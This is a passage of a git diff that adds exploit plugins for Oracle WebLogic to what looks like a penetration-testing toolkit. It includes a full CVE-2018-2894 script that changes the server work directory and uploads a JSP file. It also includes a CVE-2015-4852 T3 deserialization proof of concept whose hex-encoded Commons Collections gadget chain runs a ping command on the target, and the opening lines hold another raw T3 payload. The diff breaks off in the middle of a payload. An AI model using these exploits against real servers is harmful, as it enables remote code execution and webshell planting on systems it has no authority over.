+payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' +payload=payload+payloadObj.decode('hex') +payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + +# adjust header for appropriate message length +payload=struct.pack('>I',len(payload)) + payload[4:] + +print '[+] Sending payload...' +sock.send(payload) +data = sock.recv(2048) +print >>sys.stderr, 'received "%s"' % data diff --git a/plugins/weblogic_exp/CVE_2018_2894.py b/plugins/weblogic_exp/CVE_2018_2894.py new file mode 100644 index 0000000..72c57b2 --- /dev/null +++ b/plugins/weblogic_exp/CVE_2018_2894.py @@ -0,0 +1,132 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import re +import sys +import time +import argparse +import requests +import traceback +import xml.etree.ElementTree as ET + + +def get_current_work_path(host): + geturl = host + "/ws_utc/resources/setting/options/general" + ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'} + values = [] + try: + request = requests.get(geturl) + if request.status_code == 404: + exit("[-] {} don't exists CVE-2018-2894".format(host)) + elif "Deploying Application".lower() in request.text.lower(): + print("[*] First Deploying Website Please wait a moment ...") + time.sleep(20) + request = requests.get(geturl, headers=ua) + if "" in request.content: + root = ET.fromstring(request.content) + value = root.find("section").find("options") + for e in value: + for sub in e: + if e.tag == "parameter" and sub.tag == "defaultValue": + values.append(sub.text) + except requests.ConnectionError: + exit("[-] Cannot connect url: {}".format(geturl)) + if values: + return values[0] + else: + print("[-] Cannot get current work path\n") + exit(request.content) + + +def get_new_work_path(host): + origin_work_path = get_current_work_path(host) + works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css" + if "user_projects" in origin_work_path: + if "\\" in origin_work_path: + works = works.replace("/", "\\") + current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains" + dir_len = len(current_work_home.split("\\")) + domain_name = origin_work_path.split("\\")[dir_len] + current_work_home += "\\" + domain_name + works + else: + current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains" + dir_len = len(current_work_home.split("/")) + domain_name = origin_work_path.split("/")[dir_len] + current_work_home += "/" + domain_name + works + else: + current_work_home = origin_work_path + print("[*] cannot handle current work home dir: {}".format(origin_work_path)) + return current_work_home + + +def set_new_upload_path(host, path): + data = { + "setting_id": "general", + "BasicConfigOptions.workDir": path, + "BasicConfigOptions.proxyHost": "", + "BasicConfigOptions.proxyPort": "80"} + request = requests.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers) + if "successfully" in request.content: + return True + else: + print("[-] Change New Upload Path failed") + exit(request.content) + + +def upload_webshell(host, uri): + set_new_upload_path(host, get_new_work_path(host)) + files = { + "ks_edit_mode": "false", + "ks_password_front": password, + "ks_password_changed": "true", + "ks_filename": ("360sglab.jsp", upload_content) + } + + request = requests.post(host + uri, files=files) + response = request.text + match = re.findall("(.*?)", response) + if match: + tid = match[-1] + shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_360sglab.jsp" + if upload_content in requests.get(shell_path, headers=headers).content: + print("[+] {} exists CVE-2018-2894".format(host)) + print("[+] Check URL: {} ".format(shell_path)) + else: + print("[-] {} don't exists CVE-2018-2894".format(host)) + else: + print("[-] {} don't exists CVE-2018-2894".format(host)) + + +if __name__ == "__main__": + start = time.time() + password = "360sglab" + url = "/ws_utc/resources/setting/keystore" + parser = argparse.ArgumentParser() + parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str, + help="target, such as: http://example.com:7001") + + upload_content = "360sglab test" + headers = { + 'Content-Type': 'application/x-www-form-urlencoded', + 'X-Requested-With': 'XMLHttpRequest', } + + if len(sys.argv) == 1: + sys.argv.append('-h') + args = parser.parse_args() + target = args.target + + target = target.rstrip('/') + if "://" not in target: + target = "http://" + target + try: + upload_webshell(target, url) + except Exception as e: + print("[-] Error: \n") + traceback.print_exc() \ No newline at end of file diff --git a/plugins/weblogic_exp/__init__.py b/plugins/weblogic_exp/__init__.py new file mode 100644 index 0000000..0002af2 --- /dev/null +++ b/plugins/weblogic_exp/__init__.py @@ -0,0 +1,10 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' diff --git a/plugins/weblogic_plugin.py b/plugins/weblogic_plugin.py new file mode 100644 index 0000000..44103ae --- /dev/null +++ b/plugins/weblogic_plugin.py @@ -0,0 +1,15 @@ +#coding=utf-8 +pocs=[ + {"requests_option":"", + "url":[], + "params":[], + "data":[], + "flag":[], + "success":"", + "fail":"", + "end":"", + "admin_bursk":"", + "username":[], + "password":[], + }, +] \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2015_4852.py b/plugins/weblogic_poc/CVE_2015_4852.py new file mode 100644 index 0000000..d2982d1 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2015_4852.py @@ -0,0 +1,57 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import struct +from binascii import unhexlify + +def run(rip,rport): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + server_address = (rip,rport) + sock.connect(server_address) + + headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' + sock.sendall(headers) + + data = sock.recv(1024) + + chunk1='\x00\x00\x0b\x4d\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + + + chunk2 = "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x19\x70\x69\x6e\x67\x20\x2d\x63\x20\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x35\x33\x2e\x31\x33\x30\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a" + + + chunk3 = '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\x